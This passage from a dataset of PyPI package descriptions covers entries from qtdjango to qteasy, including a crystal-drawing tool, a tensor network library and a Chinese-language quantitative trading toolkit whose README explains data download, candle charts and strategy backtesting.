OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE\nOF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE."} +{"package": "qtdjango", "pacakge-description": "UNKNOWN"} +{"package": "qtdptools", "pacakge-description": "Failed to fetch description. HTTP Status Code: 404"} +{"package": "qtdraw", "pacakge-description": "QtDraw3D drawing tool for molecules and crystals based onPyVistaandQt.\nDrawings are associated with crystallographic symmetry operations provided byMultiPie.Authors: Hiroaki KusunoseCiting QtDraw and MultiPie: If you are using QtDraw and/or MultiPie in your scientific research, please help our scientific visibility by citing our work:Hiroaki Kusunose, Rikuto Oiwa, and Satoru Hayami, Symmetry-adapted modeling for molecules and crystals, Phys. Rev. B107, 195118 (2023).DOI:https://doi.org/10.1103/PhysRevB.107.195118Installation: QtDraw can be installed from PyPI using pip on Python >= 3.9:pip install qtdrawIt is useful to associate with the following application with.qtdwand.cifextension.MacWindowsYou can also visitPyPIorGitHubto download the source.See also,Install Guide (in Japanese)Shell commandqtdraw [filename]is available.Requirements:This library requiresTeXLiveenvironment.Symmetry operation supports are provided byMultiPie.See also:Manual (QtDraw and MultiPie).MyST syntax cheat sheetMultiPie tutorial (in Japanese)QtDraw tutorial (in Japanese)"} +{"package": "qte", "pacakge-description": "UNKNOWN"} +{"package": "qtealeaves", "pacakge-description": "qtealeavesThe qtealeaves library of Quantum TEA contains tensor network representation as\npython classes, e.g., MPS, TTN, LPTN, and TTO. qtealeaves is the API for building\nquantum models in Quantum TEA and has for example a single-tensor update ground state\nsearch for TTNs. Moreover, qtealeaves is backbone for running quantum circuits via\nQuantum matcha TEA and the frontend for the fortran backend running Quantum Green TEA,\ni.e., solving the Schr\u00f6dinger equation.DocumentationHereis the documentation. The documentation can also be built locally via sphinx.LicenseThe projectqtealeavesis hosted at the repositoryhttps://baltig.infn.it/quantum_tea_leaves/py_api_quantum_tea_leaves.git,\nand is licensed under the following license:Apache License 2.0The license applies to the files of this project as indicated\nin the header of each file, but not its dependencies.InstallationIndependent of the use-case, you have to install the dependencies. Then,\nthere are the options using it as a stand-alone package, withinquantum\nmatcha TEA, or for quantum green TEA.Local installation via pipThe package is available via PyPi andpip install qtealeaves.\nAfter cloning the repository, an local installation via pip is\nalso possible viapip install ..DependenciesThe python dependencies can be found in therequirements.txtand are required independently of the following use-cases.Stand-alone packageIf you are looking to explore small exact diagonalization examples,\nwant to run a single-tensor update ground state search with TTNs,\nor have TN-states on files to be post-processed, you are ready to\ngo.qmatchatea simulationsQuantum circuit simulations via qmatchatea have qtealeaves as a\ndependency. Follow the instructions to install qmatchatea to get\nthe right version of qtealeaves.qgreentea simulationsIf you want to use the qgreentea toolchain with TTNs and aTTNS, you need to\ninstall qtealeaves under a matching version. qgreentea provides instructions\nwhich version is compatible; see installation instructions there. qgreentea\nis not yet public, but it will be made public step-by-step."} +{"package": "qteasy", "pacakge-description": "qteasy-- \u4e00\u4e2a\u672c\u5730\u5316\u3001\u7075\u6d3b\u6613\u7528\u7684\u9ad8\u6548\u91cf\u5316\u6295\u8d44\u5de5\u5177\u5305\u57fa\u672c\u4ecb\u7ecdQTEASY\u6587\u6863\u5b89\u88c5\u4f9d\u8d56\u5305\u5b89\u88c5qteasy\u5b89\u88c5\u4f9d\u8d56\u530510\u5206\u949f\u4e86\u89e3Qteasy\u7684\u529f\u80fd\u521d\u59cb\u914d\u7f6e\u2014\u2014\u672c\u5730\u6570\u636e\u6e90\u4e0b\u8f7d\u80a1\u7968\u4ef7\u683c\u5e76\u53ef\u89c6\u5316\u521b\u5efa\u6295\u8d44\u7b56\u7565\u6295\u8d44\u7b56\u7565\u7684\u56de\u6d4b\u548c\u8bc4\u4ef7\u6295\u8d44\u7b56\u7565\u7684\u4f18\u5316\u6295\u8d44\u7b56\u7565\u7684\u5b9e\u76d8\u8fd0\u884cNote:\u76ee\u524dqteays\u6b63\u5904\u4e8e\u5bc6\u96c6\u5f00\u53d1\u6d4b\u8bd5\u9636\u6bb5\uff0c\u8f6f\u4ef6\u4e2d\u4e0d\u514d\u5b58\u5728\u4e00\u4e9b\u6f0f\u6d1e\u548cbug\uff0c\u5982\u679c\u5927\u5bb6\u4f7f\u7528\u4e2d\u51fa\u73b0\u95ee\u9898\uff0c\u6b22\u8fceIssue-\u62a5\u544abug\u6216\u8005\u63d0\u4ea4\u65b0\u529f\u80fd\u9700\u6c42\u7ed9\u6211\uff0c\u4e5f\u53ef\u4ee5\u8fdb\u5165\u8ba8\u8bba\u533a\u53c2\u4e0e\u8ba8\u8bba\u3002\u4e5f\u6b22\u8fce\u5404\u4f4d\u8d21\u732e\u4ee3\u7801\uff01\u6211\u4f1a\u5c3d\u5feb\u4fee\u590d\u95ee\u9898\u5e76\u56de\u590d\u5927\u5bb6\u7684\u95ee\u9898\u3002\u5173\u4e8eqteasy\u4f5c\u8005:Jackie PENGemail:jackie_pengzhao@163.comCreated: 2019, July, 16Latest Version:1.0.26License: BSD 3-Clause Licenseqteasy\u662f\u4e3a\u91cf\u5316\u4ea4\u6613\u4eba\u5458\u5f00\u53d1\u7684\u4e00\u5957\u91cf\u5316\u4ea4\u6613\u5de5\u5177\u5305\uff0c\u7279\u70b9\u5982\u4e0b\uff1a\u5168\u6d41\u7a0b\u8986\u76d6\u4ece\u91d1\u878d\u6570\u636e\u83b7\u53d6\u3001\u5b58\u50a8\uff0c\u5230\u4ea4\u6613\u7b56\u7565\u7684\u5f00\u53d1\u3001\u56de\u6d4b\u3001\u4f18\u5316\u3001\u5b9e\u76d8\u8fd0\u884c\u5b8c\u5168\u672c\u5730\u5316\u6240\u6709\u7684\u91d1\u878d\u6570\u636e\u3001\u7b56\u7565\u8fd0\u7b97\u548c\u4f18\u5316\u8fc7\u7a0b\u5b8c\u5168\u672c\u5730\u5316\uff0c\u4e0d\u4f9d\u8d56\u4e8e\u4efb\u4f55\u4e91\u7aef\u670d\u52a1\u4f7f\u7528\u7b80\u5355\u63d0\u4f9b\u5927\u91cf\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\uff0c\u7528\u6237\u53ef\u4ee5\u642d\u79ef\u6728\u5f0f\u5730\u521b\u5efa\u81ea\u5df1\u7684\u4ea4\u6613\u7b56\u7565\u7075\u6d3b\u591a\u53d8\u4f7f\u7528qteasy\u63d0\u4f9b\u7684\u7b56\u7565\u7c7b\uff0c\u7528\u6237\u53ef\u4ee5\u81ea\u884c\u521b\u5efa\u81ea\u5df1\u7684\u4ea4\u6613\u7b56\u7565\uff0c\u7075\u6d3b\u8bbe\u7f6e\u53ef\u8c03\u53c2\u6570qteasy\u80fd\u505a\u4ec0\u4e48\uff1f\u91d1\u878d\u5386\u53f2\u6570\u636e:\u83b7\u53d6\u3001\u6e05\u6d17\u3001\u672c\u5730\u5b58\u50a8\u5927\u91cf\u91d1\u878d\u5386\u53f2\u6570\u636e\u68c0\u7d22\u3001\u5904\u7406\u3001\u8c03\u7528\u672c\u5730\u6570\u636e\u672c\u5730\u91d1\u878d\u6570\u636e\u53ef\u89c6\u5316\u521b\u5efa\u4ea4\u6613\u7b56\u7565\u63d0\u4f9b\u8fd1\u4e03\u5341\u79cd\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\uff0c\u53ef\u4ee5\u76f4\u63a5\u642d\u79ef\u6728\u5f0f\u4f7f\u7528\u5feb\u901f\u521b\u5efa\u81ea\u5b9a\u4e49\u4ea4\u6613\u7b56\u7565\uff0c\u7075\u6d3b\u8bbe\u7f6e\u53ef\u8c03\u53c2\u6570\u4ea4\u6613\u7b56\u7565\u7684\u56de\u6d4b\u3001\u4f18\u5316\u3001\u8bc4\u4ef7\uff0c\u53ef\u89c6\u5316\u8f93\u51fa\u56de\u6d4b\u7ed3\u679c\u5b9e\u76d8\u4ea4\u6613\u6a21\u62df\u8bfb\u53d6\u5b9e\u65f6\u5e02\u573a\u6570\u636e\uff0c\u5b9e\u76d8\u8fd0\u884c\u4ea4\u6613\u7b56\u7565\u751f\u6210\u4ea4\u6613\u4fe1\u53f7\uff0c\u6a21\u62df\u4ea4\u6613\u7ed3\u679c\u8ddf\u8e2a\u8bb0\u5f55\u4ea4\u6613\u65e5\u5fd7\u3001\u80a1\u7968\u6301\u4ed3\u3001\u8d26\u6237\u8d44\u91d1\u53d8\u5316\u7b49\u4fe1\u606f\u968f\u65f6\u67e5\u770b\u4ea4\u6613\u8fc7\u7a0b\uff0c\u68c0\u67e5\u76c8\u4e8f\u60c5\u51b5\u624b\u52a8\u63a7\u5236\u4ea4\u6613\u8fdb\u7a0b\u3001\u8c03\u6574\u4ea4\u6613\u53c2\u6570\uff0c\u624b\u52a8\u4e0b\u5355\u5b89\u88c5$pipinstallqteasy\u6587\u6863\u5173\u4e8eQTEASY\u7cfb\u7edf\u7684\u66f4\u591a\u8be6\u7ec6\u89e3\u91ca\u548c\u4f7f\u7528\u65b9\u6cd5\uff0c\u8bf7\u53c2\u9605QTEASY\u6587\u6863\uff1apython \u7248\u672cpythonversion >= 3.6\u5b89\u88c5\u53ef\u9009\u4f9d\u8d56\u5305qteasy\u6240\u6709\u5fc5\u8981\u7684\u4f9d\u8d56\u5305\u90fd\u53ef\u4ee5\u5728pip\u5b89\u88c5\u7684\u540c\u65f6\u5b89\u88c5\u597d\uff0c\u4f46\u5982\u679c\u9700\u8981\u4f7f\u7528qteasy\u7684\u5168\u90e8\u529f\u80fd\uff0c\u9700\u8981\u5b89\u88c5\u4ee5\u4e0b\u4f9d\u8d56\u5305\uff1ata-lib: == 0.4.18, \u7528\u4e8e\u8ba1\u7b97\u6280\u672f\u6307\u6807pymysql: == 1.0.2, \u7528\u4e8e\u8fde\u63a5MySQL\u6570\u636e\u5e93,\u5c06\u672c\u5730\u6570\u636e\u5b58\u50a8\u5230MySQL\u6570\u636e\u5e93\uff08qteasy\u9ed8\u8ba4\u4f7f\u7528csv\u6587\u4ef6\u4f5c\u4e3a\u672c\u5730\u6570\u636e\u6e90\uff0c\u4f46\u6570\u636e\u91cf\u5927\u65f6\u63a8\u8350\u4f7f\u7528mysql\u6570\u636e\u5e93\uff0c\u8be6\u60c5\u53c2\u89c1qteasy\u4f7f\u7528\u6559\u7a0b\uff0910\u5206\u949f\u4e86\u89e3qteasy\u7684\u529f\u80fd\u5bfc\u5165qteasy\u57fa\u672c\u7684\u6a21\u5757\u5bfc\u5165\u65b9\u6cd5\u5982\u4e0bimportqteasyasqtprint(qt.__version__)\u914d\u7f6e\u672c\u5730\u6570\u636e\u6e90\u4e3a\u4e86\u4f7f\u7528qteasy\uff0c\u9700\u8981\u5927\u91cf\u7684\u91d1\u878d\u5386\u53f2\u6570\u636e\uff0c\u6240\u6709\u7684\u5386\u53f2\u6570\u636e\u90fd\u5fc5\u987b\u9996\u5148\u4fdd\u5b58\u5728\u672c\u5730\uff0c\u5982\u679c\u672c\u5730\u6ca1\u6709\u5386\u53f2\u6570\u636e\uff0c\u90a3\u4e48qteasy\u7684\u8bb8\u591a\u529f\u80fd\u5c31\u65e0\u6cd5\u6267\u884c\u3002qteasy\u9ed8\u8ba4\u901a\u8fc7tushare\u91d1\u878d\u6570\u636e\u5305\u6765\u83b7\u53d6\u5927\u91cf\u7684\u91d1\u878d\u6570\u636e\uff0c\u7528\u6237\u9700\u8981\u81ea\u884c\u7533\u8bf7API Token\uff0c\u83b7\u53d6\u76f8\u5e94\u7684\u6743\u9650\u548c\u79ef\u5206\uff08\u8be6\u60c5\u53c2\u8003\uff1ahttps://tushare.pro/document/2\uff09\u56e0\u6b64\uff0c\u5728\u4f7f\u7528qteasy\u4e4b\u524d\u9700\u8981\u5bf9\u672c\u5730\u6570\u636e\u6e90\u548ctushare\u8fdb\u884c\u5fc5\u8981\u7684\u914d\u7f6e\u3002\u5728QT_ROOT_PATH/qteasy/\u8def\u5f84\u4e0b\u6253\u5f00\u914d\u7f6e\u6587\u4ef6qteasy.cfg\uff0c\u53ef\u4ee5\u770b\u5230\u4e0b\u9762\u5185\u5bb9\uff1a# qteasy configuration file\n# following configurations will be loaded when initialize qteasy\n\n# example:\n# local_data_source = database\u914d\u7f6etushare token\u5c06\u4f60\u83b7\u5f97\u7684tushare API token\u6dfb\u52a0\u5230\u914d\u7f6e\u6587\u4ef6\u4e2d\uff0c\u5982\u4e0b\u6240\u793a\uff1atushare_token = <\u4f60\u7684tushare API Token>\u914d\u7f6e\u672c\u5730\u6570\u636e\u6e90 \u2014\u2014 \u7528MySQL\u6570\u636e\u5e93\u4f5c\u4e3a\u672c\u5730\u6570\u636e\u6e90\u9ed8\u8ba4\u60c5\u51b5\u4e0bqteasy\u4f7f\u7528\u5b58\u50a8\u5728data/\u8def\u5f84\u4e0b\u7684.csv\u6587\u4ef6\u4f5c\u4e3a\u6570\u636e\u6e90\uff0c\u4e0d\u9700\u8981\u7279\u6b8a\u8bbe\u7f6e\u3002\n\u5982\u679c\u8bbe\u7f6e\u4f7f\u7528mysql\u6570\u636e\u5e93\u4f5c\u4e3a\u672c\u5730\u6570\u636e\u6e90\uff0c\u5728\u914d\u7f6e\u6587\u4ef6\u4e2d\u6dfb\u52a0\u4ee5\u4e0b\u914d\u7f6e\uff1alocal_data_source = database \n\nlocal_db_host = \nlocal_db_port = \nlocal_db_user = \nlocal_db_password = \nlocal_db_name = \u5173\u95ed\u5e76\u4fdd\u5b58\u597d\u914d\u7f6e\u6587\u4ef6\u540e\uff0c\u91cd\u65b0\u5bfc\u5165qteasy\uff0c\u5c31\u5b8c\u6210\u4e86\u6570\u636e\u6e90\u7684\u914d\u7f6e\uff0c\u53ef\u4ee5\u5f00\u59cb\u4e0b\u8f7d\u6570\u636e\u5230\u672c\u5730\u4e86\u3002\u4e0b\u8f7d\u91d1\u878d\u5386\u53f2\u6570\u636e\u8981\u4e0b\u8f7d\u91d1\u878d\u4ef7\u683c\u6570\u636e\uff0c\u4f7f\u7528qt.refill_data_source()\u51fd\u6570\u3002\u4e0b\u9762\u7684\u4ee3\u7801\u4e0b\u8f7d2021\u53ca2022\u4e24\u5e74\u5185\u6240\u6709\u80a1\u7968\u3001\u6240\u6709\u6307\u6570\u7684\u65e5K\u7ebf\u6570\u636e\uff0c\u540c\u65f6\u4e0b\u8f7d\u6240\u6709\u7684\u80a1\u7968\u548c\u57fa\u91d1\u7684\u57fa\u672c\u4fe1\u606f\u6570\u636e\u3002\n\uff08\u6839\u636e\u7f51\u7edc\u901f\u5ea6\uff0c\u4e0b\u8f7d\u6570\u636e\u53ef\u80fd\u9700\u8981\u5341\u5206\u949f\u5de6\u53f3\u7684\u65f6\u95f4\uff0c\u5982\u679c\u5b58\u50a8\u4e3acsv\u6587\u4ef6\uff0c\u5c06\u5360\u7528\u5927\u7ea6200MB\u7684\u78c1\u76d8\u7a7a\u95f4\uff09\uff1aqt.refill_data_source(tables=['stock_daily',# \u80a1\u7968\u7684\u65e5\u7ebf\u4ef7\u683c'index_daily',# \u6307\u6570\u7684\u65e5\u7ebf\u4ef7\u683c'basics'],# \u80a1\u7968\u548c\u57fa\u91d1\u7684\u57fa\u672c\u4fe1\u606fstart_date='20210101',# \u4e0b\u8f7d\u6570\u636e\u7684\u8d77\u6b62\u65f6\u95f4end_date='20221231',)\u6570\u636e\u4e0b\u8f7d\u5230\u672c\u5730\u540e\uff0c\u53ef\u4ee5\u4f7f\u7528qt.get_history_data()\u6765\u83b7\u53d6\u6570\u636e\uff0c\u5982\u679c\u540c\u65f6\u83b7\u53d6\u591a\u4e2a\u80a1\u7968\u7684\u5386\u53f2\u6570\u636e\uff0c\u6bcf\u4e2a\u80a1\u7968\u7684\u5386\u53f2\u6570\u636e\u4f1a\u88ab\u5206\u522b\u4fdd\u5b58\u5230\u4e00\u4e2adict\u4e2d\u3002qt.get_history_data(htypes='open, high, low, close',shares='000001.SZ, 000300.SH',start='20210101',end='20210115')\u8fd0\u884c\u4e0a\u8ff0\u4ee3\u7801\u4f1a\u5f97\u5230\u4e00\u4e2aDict\u5bf9\u8c61\uff0c\u5305\u542b\u4e24\u4e2a\u80a1\u7968\"000001.SZ\"\u4ee5\u53ca\"000005.SZ\"\u7684K\u7ebf\u6570\u636e\uff08\u6570\u636e\u5b58\u50a8\u4e3aDataFrame\uff09\uff1a{'000001.SZ':\n open high low close\n 2021-01-04 19.10 19.10 18.44 18.60\n 2021-01-05 18.40 18.48 17.80 18.17\n 2021-01-06 18.08 19.56 18.00 19.56\n ... \n 2021-01-13 21.00 21.01 20.40 20.70\n 2021-01-14 20.68 20.89 19.95 20.17\n 2021-01-15 21.00 21.95 20.82 21.00,\n \n '000300.SH':\n open high low close\n 2021-01-04 5212.9313 5284.4343 5190.9372 5267.7181\n 2021-01-05 5245.8355 5368.5049 5234.3775 5368.5049\n 2021-01-06 5386.5144 5433.4694 5341.4304 5417.6677\n ...\n 2021-01-13 5609.2637 5644.7195 5535.1435 5577.9711\n 2021-01-14 5556.2125 5568.0179 5458.6818 5470.4563\n 2021-01-15 5471.3910 5500.6348 5390.2737 5458.0812}\u9664\u4e86\u4ef7\u683c\u6570\u636e\u4ee5\u5916\uff0cqteasy\u8fd8\u53ef\u4ee5\u4e0b\u8f7d\u5e76\u7ba1\u7406\u5305\u62ec\u8d22\u52a1\u62a5\u8868\u3001\u6280\u672f\u6307\u6807\u3001\u57fa\u672c\u9762\u6570\u636e\u7b49\u5728\u5185\u7684\u5927\u91cf\u91d1\u878d\u6570\u636e\uff0c\u8be6\u60c5\u8bf7\u53c2\u89c1qteasy\u6587\u6863\u80a1\u7968\u7684\u6570\u636e\u4e0b\u8f7d\u540e\uff0c\u4f7f\u7528qt.candle()\u53ef\u4ee5\u663e\u793a\u80a1\u7968\u6570\u636eK\u7ebf\u56fe\u3002importqteasyasqtdata=qt.candle('000300.SH',start='2021-06-01',end='2021-8-01',asset_type='IDX')qteasy\u7684K\u7ebf\u56fe\u51fd\u6570candle\u652f\u6301\u901a\u8fc7\u516d\u4f4d\u6570\u80a1\u7968/\u6307\u6570\u4ee3\u7801\u67e5\u8be2\u51c6\u786e\u7684\u8bc1\u5238\u4ee3\u7801\uff0c\u4e5f\u652f\u6301\u901a\u8fc7\u80a1\u7968\u3001\u6307\u6570\u540d\u79f0\u663e\u793aK\u7ebf\u56feqt.candle()\u652f\u6301\u529f\u80fd\u5982\u4e0b\uff1a\u663e\u793a\u80a1\u7968\u3001\u57fa\u91d1\u3001\u671f\u8d27\u7684K\u7ebf\u663e\u793a\u590d\u6743\u4ef7\u683c\u663e\u793a\u5206\u949f\u3001 \u5468\u6216\u6708K\u7ebf\u663e\u793a\u4e0d\u540c\u79fb\u52a8\u5747\u7ebf\u4ee5\u53caMACD/KDJ\u7b49\u6307\u6807\u8be6\u7ec6\u7684\u7528\u6cd5\u8bf7\u53c2\u8003\u6587\u6863\uff0c\u793a\u4f8b\u5982\u4e0b(\u8bf7\u5148\u4f7f\u7528qt.refill_data_source()\u4e0b\u8f7d\u76f8\u5e94\u7684\u5386\u53f2\u6570\u636e)\uff1aimportqteasyasqt# \u573a\u5185\u57fa\u91d1\u7684\u5c0f\u65f6K\u7ebf\u56feqt.candle('159601',start='20220121',freq='h')# \u6caa\u6df1300\u6307\u6570\u7684\u65e5K\u7ebf\u56feqt.candle('000300',start='20200121')# \u80a1\u7968\u768430\u5206\u949fK\u7ebf\uff0c\u590d\u6743\u4ef7\u683cqt.candle('\u4e2d\u56fd\u7535\u4fe1',start='20211021',freq='30min',adj='b')# \u671f\u8d27K\u7ebf\uff0c\u4e09\u6761\u79fb\u52a8\u5747\u7ebf\u5206\u522b\u4e3a9\u5929\u300112\u5929\u300126\u5929qt.candle('\u6caa\u94dc\u4e3b\u529b',start='20211021',mav=[9,12,26])# \u573a\u5916\u57fa\u91d1\u51c0\u503c\u66f2\u7ebf\u56fe\uff0c\u590d\u6743\u51c0\u503c\uff0c\u4e0d\u663e\u793a\u79fb\u52a8\u5747\u7ebfqt.candle('000001.OF',start='20200101',asset_type='FD',adj='b',mav=[])\u751f\u6210\u7684K\u7ebf\u56fe\u53ef\u4ee5\u662f\u4e00\u4e2a\u4ea4\u4e92\u5f0f\u52a8\u6001K\u7ebf\u56fe\uff08\u8bf7\u6ce8\u610f\uff0cK\u7ebf\u56fe\u57fa\u4e8ematplotlib\u7ed8\u5236\uff0c\u5728\u4f7f\u7528\u4e0d\u540c\u7684\u7ec8\u7aef\u65f6\uff0c\u663e\u793a\u529f\u80fd\u6709\u6240\u533a\u522b\uff0c\u67d0\u4e9b\u7ec8\u7aef\u5e76\u4e0d\u652f\u6301\n\u52a8\u6001\u56fe\u8868\uff0c\u8be6\u60c5\u8bf7\u53c2\u9605matplotlib\u6587\u6863\u5728\u4f7f\u7528\u52a8\u6001K\u7ebf\u56fe\u65f6\uff0c\u7528\u6237\u53ef\u4ee5\u7528\u9f20\u6807\u548c\u952e\u76d8\u63a7\u5236K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\uff1a\u9f20\u6807\u5728\u56fe\u8868\u4e0a\u5de6\u53f3\u62d6\u52a8\uff1a\u53ef\u4ee5\u79fb\u52a8K\u7ebf\u56fe\u663e\u793a\u66f4\u65e9\u6216\u66f4\u665a\u7684K\u7ebf\u9f20\u6807\u6eda\u8f6e\u5728\u56fe\u8868\u4e0a\u6eda\u52a8\uff0c\u53ef\u4ee5\u7f29\u5c0f\u6216\u653e\u5927K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\u901a\u8fc7\u952e\u76d8\u5de6\u53f3\u65b9\u5411\u952e\uff0c\u53ef\u4ee5\u79fb\u52a8K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\u663e\u793a\u66f4\u65e9\u6216\u66f4\u665a\u7684K\u7ebf\u901a\u8fc7\u952e\u76d8\u4e0a\u4e0b\u952e\uff0c\u53ef\u4ee5\u7f29\u5c0f\u6216\u653e\u5927K\u7ebf\u56fe\u7684\u663e\u793a\u8303\u56f4\u5728K\u7ebf\u56fe\u4e0a\u53cc\u51fb\u9f20\u6807\uff0c\u53ef\u4ee5\u5207\u6362\u4e0d\u540c\u7684\u5747\u7ebf\u7c7b\u578b\u5728K\u7ebf\u56fe\u7684\u6307\u6807\u533a\u57df\u53cc\u51fb\uff0c\u53ef\u4ee5\u5207\u6362\u4e0d\u540c\u7684\u6307\u6807\u7c7b\u578b\uff1aMACD\uff0cRSI\uff0cDEMA\u5173\u4e8eDataSource\u5bf9\u8c61\u7684\u66f4\u591a\u8be6\u7ec6\u4ecb\u7ecd\uff0c\u8bf7\u53c2\u89c1qteasy\u6587\u6863\u521b\u5efa\u4e00\u4e2a\u6295\u8d44\u7b56\u7565qteasy\u4e2d\u7684\u6240\u6709\u4ea4\u6613\u7b56\u7565\u90fd\u662f\u7531qteast.Operator\uff08\u4ea4\u6613\u5458\uff09\u5bf9\u8c61\u6765\u5b9e\u73b0\u56de\u6d4b\u548c\u8fd0\u884c\u7684\uff0cOperator\u5bf9\u8c61\u662f\u4e00\u4e2a\u7b56\u7565\u5bb9\u5668\uff0c\u4e00\u4e2a\u4ea4\u6613\u5458\u53ef\u4ee5\u540c\u65f6\n\u7ba1\u7406\u591a\u4e2a\u4e0d\u540c\u7684\u4ea4\u6613\u7b56\u7565\u3002queasy\u63d0\u4f9b\u4e86\u4e24\u79cd\u65b9\u5f0f\u521b\u5efa\u4ea4\u6613\u7b56\u7565\uff0c\u8be6\u7ec6\u7684\u8bf4\u660e\u8bf7\u53c2\u89c1\u4f7f\u7528\u6559\u7a0b\uff1a\u4f7f\u7528\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\u7ec4\u5408\u901a\u8fc7\u7b56\u7565\u7c7b\u81ea\u884c\u521b\u5efa\u7b56\u7565\u751f\u6210\u4e00\u4e2aDMA\u5747\u7ebf\u62e9\u65f6\u4ea4\u6613\u7b56\u7565\u5728\u8fd9\u91cc\uff0c\u6211\u4eec\u5c06\u4f7f\u7528\u4e00\u4e2a\u5185\u7f6e\u7684DMA\u5747\u7ebf\u62e9\u65f6\u7b56\u7565\u6765\u751f\u6210\u4e00\u4e2a\u6700\u7b80\u5355\u7684\u5927\u76d8\u62e9\u65f6\u4ea4\u6613\u7cfb\u7edf\u3002\u6240\u6709\u5185\u7f6e\u4ea4\u6613\u7b56\u7565\u7684\u6e05\u5355\u548c\u8be6\u7ec6\u8bf4\u660e\u8bf7\u53c2\u89c1\u6587\u6863\u3002\u521b\u5efaOperator\u5bf9\u8c61\u65f6\u4f20\u5165\u53c2\u6570\uff1astrategies='DMA'\uff0c\u53ef\u4ee5\u65b0\u5efa\u4e00\u4e2aDMA\u53cc\u5747\u7ebf\u62e9\u65f6\u4ea4\u6613\u7b56\u7565\u3002\n\u521b\u5efa\u597dOperator\u5bf9\u8c61\u540e\uff0c\u53ef\u4ee5\u7528op.info()\u6765\u67e5\u770b\u5b83\u7684\u4fe1\u606f\u3002importqteasyasqtop=qt.Operator(strategies='dma')op.info()\u73b0\u5728\u53ef\u4ee5\u770b\u5230op\u4e2d\u6709\u4e00\u4e2a\u4ea4\u6613\u7b56\u7565\uff0cID\u662fdma\uff0c\u6211\u4eec\u5728Operator\u5c42\u9762\u8bbe\u7f6e\u6216\u4fee\u6539\u7b56\u7565\u7684\u53c2\u6570\n\u65f6\uff0c\u90fd\u9700\u8981\u5f15\u7528\u8fd9\u4e2aID\u3002DMA\u662f\u4e00\u4e2a\u5185\u7f6e\u7684\u5747\u7ebf\u62e9\u65f6\u7b56\u7565\uff0c\u5b83\u901a\u8fc7\u8ba1\u7b97\u80a1\u7968\u6bcf\u65e5\u6536\u76d8\u4ef7\u7684\u5feb\u3001\u6162\u4e24\u6839\u79fb\u52a8\u5747\u7ebf\u7684\u5dee\u503cDMA\u4e0e\u5176\u79fb\u52a8\u5e73\u5747\u503cAMA\u4e4b\u95f4\u7684\u4ea4\u53c9\u60c5\u51b5\u6765\u786e\u5b9a\u591a\u7a7a\u6216\u4e70\u5356\u70b9\u3002\uff1a\u4f7f\u7528qt.built_ins()\u51fd\u6570\u53ef\u4ee5\u67e5\u770bDMA\u7b56\u7565\u7684\u8be6\u60c5\uff0c\u4f8b\u5982\uff1aimportqteasyasqtqt.built_ins('dma')\u5f97\u5230\uff1aDMA\u62e9\u65f6\u7b56\u7565\n\n \u7b56\u7565\u53c2\u6570\uff1a\n s, int, \u77ed\u5747\u7ebf\u5468\u671f\n l, int, \u957f\u5747\u7ebf\u5468\u671f\n d, int, DMA\u5468\u671f\n \u4fe1\u53f7\u7c7b\u578b\uff1a\n PS\u578b\uff1a\u767e\u5206\u6bd4\u4e70\u5356\u4ea4\u6613\u4fe1\u53f7\n \u4fe1\u53f7\u89c4\u5219\uff1a\n \u5728\u4e0b\u9762\u60c5\u51b5\u4e0b\u4ea7\u751f\u4e70\u5165\u4fe1\u53f7\uff1a\n 1\uff0c DMA\u5728AMA\u4e0a\u65b9\u65f6\uff0c\u591a\u5934\u533a\u95f4\uff0c\u5373DMA\u7ebf\u81ea\u4e0b\u800c\u4e0a\u7a7f\u8d8aAMA\u7ebf\u540e\uff0c\u8f93\u51fa\u4e3a1\n 2\uff0c DMA\u5728AMA\u4e0b\u65b9\u65f6\uff0c\u7a7a\u5934\u533a\u95f4\uff0c\u5373DMA\u7ebf\u81ea\u4e0a\u800c\u4e0b\u7a7f\u8d8aAMA\u7ebf\u540e\uff0c\u8f93\u51fa\u4e3a0\n 3\uff0c DMA\u4e0e\u80a1\u4ef7\u53d1\u751f\u80cc\u79bb\u65f6\u7684\u4ea4\u53c9\u4fe1\u53f7\uff0c\u53ef\u4fe1\u5ea6\u8f83\u9ad8\n\n \u7b56\u7565\u5c5e\u6027\u7f3a\u7701\u503c\uff1a\n \u9ed8\u8ba4\u53c2\u6570\uff1a(12, 26, 9)\n \u6570\u636e\u7c7b\u578b\uff1aclose \u6536\u76d8\u4ef7\uff0c\u5355\u6570\u636e\u8f93\u5165\n \u91c7\u6837\u9891\u7387\uff1a\u5929\n \u7a97\u53e3\u957f\u5ea6\uff1a270\n \u53c2\u6570\u8303\u56f4\uff1a[(10, 250), (10, 250), (8, 250)]\n \u7b56\u7565\u4e0d\u652f\u6301\u53c2\u8003\u6570\u636e\uff0c\u4e0d\u652f\u6301\u4ea4\u6613\u6570\u636e\u5728\u9ed8\u8ba4\u60c5\u51b5\u4e0b\uff0c\u7b56\u7565\u6709\u4e09\u4e2a\u53ef\u8c03\u53c2\u6570\uff1a(12,26,9), \u4f46\u6211\u4eec\u53ef\u4ee5\u7ed9\u51fa\u4efb\u610f\u5927\u4e8e2\u5c0f\u4e8e250\u7684\u4e09\u4e2a\u6574\u6570\u4f5c\u4e3a\u7b56\u7565\u7684\u53c2\u6570\uff0c\u4ee5\u9002\u5e94\u4e0d\u540c\u4ea4\u6613\u6d3b\u8dc3\u5ea6\u7684\u80a1\u7968\u3001\u6216\u8005\u9002\u5e94\n\u4e0d\u540c\u7684\u7b56\u7565\u8fd0\u884c\u5468\u671f\u3002\u56de\u6d4b\u5e76\u8bc4\u4ef7\u4ea4\u6613\u7b56\u7565\u7684\u6027\u80fd\u8868\u73b0queasy\u53ef\u4ee5\u4f7f\u7528\u5386\u53f2\u6570\u636e\u56de\u6d4b\u7b56\u7565\u8868\u73b0\u5e76\u8f93\u51fa\u56fe\u8868\u5982\u4e0b\uff1a\u4f7f\u7528\u9ed8\u8ba4\u53c2\u6570\u56de\u6d4b\u521a\u624d\u5efa\u7acb\u7684DMA\u7b56\u7565\u5728\u5386\u53f2\u6570\u636e\u4e0a\u7684\u8868\u73b0\uff0c\u53ef\u4ee5\u4f7f\u7528op.run()\u3002importqteasyasqtop=qt.Operator(strategies='dma')res=op.run(mode=1,# \u5386\u53f2\u56de\u6d4b\u6a21\u5f0fasset_pool='000300.SH',# 